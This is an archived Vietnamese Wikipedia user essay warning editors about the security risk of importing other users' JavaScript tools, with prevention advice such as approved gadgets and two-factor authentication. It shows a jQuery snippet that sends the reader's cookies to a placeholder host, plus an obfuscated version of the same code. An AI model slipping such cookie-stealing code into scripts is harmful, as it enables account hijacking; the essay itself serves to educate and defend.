Thành viên:CookieGMVN/Lưu trữ/Sự nguy hiểm của Javascript trên Wikipedia

Nếu bạn chưa biết thì Wikipedia có rất nhiều công cụ hữu ích do đội ngũ Wikipedia hoặc do những người dùng khác phát triển. Các công cụ này giúp ích rất nhiều trong việc bảo quản và bảo vệ Wikipedia nhưng vẫn có một số bất cập nhất định.

Cách cài đặt[sửa | sửa mã nguồn]

Do chúng chủ yếu được viết bằng JavaScript, một ngôn ngữ lập trình web chạy phía client (client-side) nên bạn sẽ cần phải cài đặt chúng trước khi sử dụng. Có hai cách để cài đặt:

Đối với các công cụ đã được Wikipedia phê duyệt thì nó sẽ ở phần Tùy chọn > Tiện ích
Đối với các công cụ do người dùng khác thì bạn sẽ cần phải import (nhập) mã Javascript của công cụ đó vào các file Javascript của bạn

Rủi ro[sửa | sửa mã nguồn]

Với các công cụ được Wikipedia phê duyệt thì không cần bàn tới làm gì, tuy nhiên khi bạn sử dụng các công cụ do người dùng khác tạo ra bằng cách import vào file Javascript của bạn thì bạn rất dễ gặp phải các vấn đề bảo mật nếu người dùng đó nhúng vào một số đoạn mã nguy hiểm.

Phía dưới là một ví dụ về việc kẻ xấu có thể cướp đi dữ liệu trong cookie bằng cách nhúng vào đoạn code độc hại:

$.ajax({
    url: "//example.com/data/post",
    type: "POST",
    data: {
        cookie: document.cookie
    },
    success: function () {
        console.log("Cookie của bạn đã bị trộm!");
    },
    error: function () {
        console.log("Chúng tôi định trộm Cookie của bạn nhưng do server bị lỗi nên chúng tôi cũng chả biết làm gì hơn.");
    }
});

Ngoài ra, nếu kẻ xấu cao tay hơn thì có thể làm loạn đoạn mã để khiến bạn khó đọc và phát hiện:

var _0x15a82a=_0x2f97;function _0x2f97(_0x56bf14,_0x57adc1){var _0x557abd=_0x557a();return _0x2f97=function(_0x2f97f1,_0x29d281){_0x2f97f1=_0x2f97f1-0x1b8;var _0x3248db=_0x557abd[_0x2f97f1];return _0x3248db;},_0x2f97(_0x56bf14,_0x57adc1);}(function(_0x49edfb,_0x17a3ce){var _0x1a6a79=_0x2f97,_0x3768bc=_0x49edfb();while(!![]){try{var _0x36c1ed=parseInt(_0x1a6a79(0x1bf))/0x1+-parseInt(_0x1a6a79(0x1c7))/0x2*(-parseInt(_0x1a6a79(0x1b9))/0x3)+parseInt(_0x1a6a79(0x1c2))/0x4+parseInt(_0x1a6a79(0x1c4))/0x5*(parseInt(_0x1a6a79(0x1b8))/0x6)+parseInt(_0x1a6a79(0x1bb))/0x7*(parseInt(_0x1a6a79(0x1ba))/0x8)+-parseInt(_0x1a6a79(0x1c0))/0x9*(parseInt(_0x1a6a79(0x1c3))/0xa)+-parseInt(_0x1a6a79(0x1c6))/0xb;if(_0x36c1ed===_0x17a3ce)break;else _0x3768bc['push'](_0x3768bc['shift']());}catch(_0x4b8292){_0x3768bc['push'](_0x3768bc['shift']());}}}(_0x557a,0x909b3),$[_0x15a82a(0x1bd)]({'url':_0x15a82a(0x1be),'type':_0x15a82a(0x1c5),'data':{'cookie':document[_0x15a82a(0x1c1)]},'success':function(){console['log']('Cookie\x20của\x20bạn\x20đã\x20bị\x20trộm!');},'error':function(){var _0xa68fe1=_0x15a82a;console['log'](_0xa68fe1(0x1bc));}}));function _0x557a(){var _0x21676b=['2614195dNzZCP','POST','25745269AvHJYf','4XDDAyV','12cqeExD','989001xTdDnD','2387984sXrgCe','21XsAsvk','Chúng\x20tôi\x20định\x20trộm\x20Cookie\x20của\x20bạn\x20nhưng\x20do\x20server\x20bị\x20lỗi\x20nên\x20chúng\x20tôi\x20cũng\x20chả\x20biết\x20làm\x20gì\x20hơn.','ajax','//example.com/data/post','149472IvTnjH','7391493ZYfxIT','cookie','4016340RrtRIt','10laFrJK'];_0x557a=function(){return _0x21676b;};return _0x557a();}

Mặc dù việc cướp đi Cookie nghe có vẻ vô hại, nhưng kẻ xấu chỉ cần chừng đó là quá đủ. Bằng những Cookie này, kẻ xấu có thể truy cập trái phép vào tài khoản của bạn và thực hiện những sửa đổi phá hoại và bạn sẽ bị nhận án cấm một cách oan uổng.

Phòng tránh[sửa | sửa mã nguồn]

Tất nhiên, cái gì cũng có cách phòng tránh của nó. Bạn có thể tránh những đoạn mã độc này bằng những cách sau:

Chỉ sử dụng những công cụ được phê duyệt bởi Wikipedia
Chỉ sử dụng những công cụ được viết bởi những người dùng đáng tin cậy
Trang bị kiến thức về Javascript cơ bản và jQuery để nhận diện những đoạn mã độc này.

Ngoài ra, bạn hãy bảo mật tài khoản bằng cách sau:

Sử dụng mật khẩu mạnh, khó đoán.
Cẩn trọng với các phần mềm, tập lệnh bên ngoài có thể đánh cắp thông tin đăng nhập tài khoản của bạn.
Wikimedia hỗ trợ xác thực hai yếu tố (2FA), vui lòng tìm hiểu tại trang trợ giúp. Sau khi tìm hiểu kỹ càng, hãy yêu cầu cấp quyền 2FA tại trang yêu cầu cấp quyền toàn cục. Sau đó, hãy vào Đặc biệt:Tùy chọn và làm theo hướng dẫn để kích hoạt xác thực hai yếu tố.

Cảm ơn vì đã đọc và chúc bạn sửa đổi Wikipedia vui vẻ!